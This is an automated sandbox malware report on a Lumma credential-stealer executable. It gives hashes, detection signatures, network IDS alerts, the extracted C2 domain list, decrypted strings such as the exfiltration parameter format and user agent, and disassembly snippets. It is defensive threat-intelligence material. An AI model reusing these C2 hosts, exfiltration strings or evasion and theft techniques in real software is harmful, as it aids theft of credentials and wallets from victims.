Edit tour

Windows Analysis Report
uU6IvUPN39.exe

Overview

General Information

Sample name:	uU6IvUPN39.exe renamed because original name is a hash value
Original sample name:	a478b8943ef3239752d731e7290c4a3d.exe
Analysis ID:	1586508
MD5:	a478b8943ef3239752d731e7290c4a3d
SHA1:	4d84b6e0e29f24609a5e47edb2e75a05871b2e8b
SHA256:	3e1364322293b0e928397a936ef70d087273fb886bb910ded4dbc8f7085f8c60
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

uU6IvUPN39.exe (PID: 2960 cmdline: "C:\Users\user\Desktop\uU6IvUPN39.exe" MD5: A478B8943EF3239752D731E7290C4A3D)

WerFault.exe (PID: 5324 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 1820 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["versersleep.shop", "skidjazzyric.click", "handscreamny.shop", "femalsabler.shop", "robinsharez.shop", "crowdwarek.shop", "chipdonkeruz.shop", "apporholis.shop", "soundtappysk.shop"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1539359212.00000000006AA000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xf30:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: uU6IvUPN39.exe PID: 2960	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T08:43:35.571305+0100	2028371	3	Unknown Traffic	192.168.2.8	49706	104.21.96.1	443	TCP
2025-01-09T08:43:36.562488+0100	2028371	3	Unknown Traffic	192.168.2.8	49707	104.21.96.1	443	TCP
2025-01-09T08:43:38.043716+0100	2028371	3	Unknown Traffic	192.168.2.8	49708	104.21.96.1	443	TCP
2025-01-09T08:43:39.209528+0100	2028371	3	Unknown Traffic	192.168.2.8	49709	104.21.96.1	443	TCP
2025-01-09T08:43:40.747263+0100	2028371	3	Unknown Traffic	192.168.2.8	49710	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T08:43:36.028845+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49706	104.21.96.1	443	TCP
2025-01-09T08:43:37.320591+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49707	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T08:43:36.028845+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49706	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T08:43:37.320591+0100	2049812	1	A Network Trojan was detected	192.168.2.8	49707	104.21.96.1	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T08:43:38.622693+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.8	49708	104.21.96.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: uU6IvUPN39.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://skidjazzyric.click/apij;	Avira URL Cloud: Label: malware
Source: https://skidjazzyric.click/	Avira URL Cloud: Label: malware
Source: https://skidjazzyric.click/X	Avira URL Cloud: Label: malware
Source: https://skidjazzyric.click:443/apiicrosoft	Avira URL Cloud: Label: malware
Source: https://skidjazzyric.click/&_	Avira URL Cloud: Label: malware
Source: https://skidjazzyric.click/E	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.3.uU6IvUPN39.exe.2180000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["versersleep.shop", "skidjazzyric.click", "handscreamny.shop", "femalsabler.shop", "robinsharez.shop", "crowdwarek.shop", "chipdonkeruz.shop", "apporholis.shop", "soundtappysk.shop"], "Build id": "4h5VfH--"}

Multi AV Scanner detection for submitted file

Source: uU6IvUPN39.exe	Virustotal: Detection: 56%			Perma Link
Source: uU6IvUPN39.exe	ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: uU6IvUPN39.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String decryptor: robinsharez.shop
Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String decryptor: handscreamny.shop
Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String decryptor: chipdonkeruz.shop
Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String decryptor: versersleep.shop
Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String decryptor: crowdwarek.shop
Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String decryptor: apporholis.shop
Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String decryptor: femalsabler.shop
Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String decryptor: soundtappysk.shop
Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String decryptor: skidjazzyric.click
Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.1416437520.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 4h5VfH--

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

Code function: 0_2_00415720 CryptUnprotectData,

0_2_00415720

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

Unpacked PE file: 0.2.uU6IvUPN39.exe.400000.0.unpack

Source: uU6IvUPN39.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49710 version: TLS 1.2

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

Directory queried: number of queries: 1001

Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov dword ptr [esp+3Ch], edx	0_2_0043B870
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov edx, ecx	0_2_0043B870
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov esi, ecx	0_2_00415720
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ecx, eax	0_2_00415720
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h	0_2_00419840
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax]	0_2_0040A05C
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	0_2_00427070
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_0042D830
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	0_2_0043F0E0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0041B882
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then jmp eax	0_2_004418A0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0041B173
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_0042B170
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0041A900
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0041B184
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then test esi, esi	0_2_0043C9A0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [ecx], al	0_2_0041B243
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0042EA62
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	0_2_00402210
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ecx, eax	0_2_0040AA32
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]	0_2_00425AF0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ecx, eax	0_2_00428280
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_0041F2A0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ebx, eax	0_2_00405AB0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ebp, eax	0_2_00405AB0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ecx, edx	0_2_0040B2B0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0042EB5F
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0042BB00
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0041BB21
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	0_2_00441B20
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0041AB2A
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]	0_2_0040C334
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+72B923DBh]	0_2_0040C3EC
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ebx, edx	0_2_0042DBF0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then jmp ecx	0_2_0040D334
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_00422380
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]	0_2_0041BBA0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov dword ptr [ebx], 00000022h	0_2_0042BBA0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0042EBA1
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ecx, eax	0_2_00440BAB
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0042EBB3
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	0_2_00441BB0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	0_2_00441C40
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ecx, eax	0_2_00442470
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	0_2_00426C76
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov eax, edi	0_2_0041C400
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00417405
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]	0_2_00417405
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov edx, ecx	0_2_00417405
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_00414C20
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h	0_2_0044042D
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ecx, eax	0_2_0044042D
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0041B484
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov word ptr [esi], cx	0_2_00427490
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	0_2_00425D6A
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00438520
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh	0_2_00442D20
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then push edi	0_2_0043C5A0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]	0_2_0043C5A0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_0042B652
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0041B667
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ecx, dword ptr [0044C548h]	0_2_00418672
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00409E09
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00407620
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00407620
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then jmp ecx	0_2_0040CEC7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]	0_2_00416ED0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]	0_2_0041BEE1
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0041AEFF
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]	0_2_0040DFE2
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_0040DFE2
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]	0_2_00408F90
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh	0_2_004427B0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]	0_2_0213E249
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_0213E249
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax]	0_2_0213A2C3
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	0_2_0216F347
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0214B3DA
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0214B3EB
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0213A070
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov esi, ecx	0_2_021460EF
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]	0_2_02147137
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then jmp ecx	0_2_0213D12E
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]	0_2_0214C148
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0214B166
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]	0_2_021391F7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	0_2_021721EA
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then jmp ecx	0_2_0213D59B
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov eax, edi	0_2_0214C667
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h	0_2_02170694
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ecx, eax	0_2_02170694
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ecx, eax	0_2_021726D7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov word ptr [esi], cx	0_2_021576F7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0214B6EB
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0214773F
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_02168787
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	0_2_02132477
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [ecx], al	0_2_0214B4AA
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ecx, eax	0_2_021584E7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_0214F507
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]	0_2_0213C59B
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_021525E7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh	0_2_02172A17
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ecx, edx	0_2_0213BA6C
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_0215DA97
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h	0_2_02149AA7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov dword ptr [esp+3Ch], edx	0_2_0216BAD7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov edx, ecx	0_2_0216BAD7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]	0_2_02147AE4
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov edx, ecx	0_2_02147AE4
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0214BAE9
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0214AB67
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	0_2_02156BA7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then push edi	0_2_0216C807
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]	0_2_0216C807
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ecx, dword ptr [0044C548h]	0_2_02148809
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_02137887
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_02137887
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_0215B8B5
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_021458FA
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ecx, eax	0_2_02170E12
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0215EE1A
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov dword ptr [ebx], 00000022h	0_2_0215BE07
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0215EE08
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]	0_2_0214BE2C
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ebx, edx	0_2_0215DE57
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh	0_2_02172F87
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then test esi, esi	0_2_0216CC07
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then jmp eax	0_2_02171C3E
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ecx, eax	0_2_0213AC99
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0215ECC9
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ecx, eax	0_2_02146D15
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ebx, eax	0_2_02135D17
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ebp, eax	0_2_02135D17
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]	0_2_02155D57
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0215BD67
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0214AD91
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0214BD88
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0215EDC6

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49707 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 104.21.96.1:443
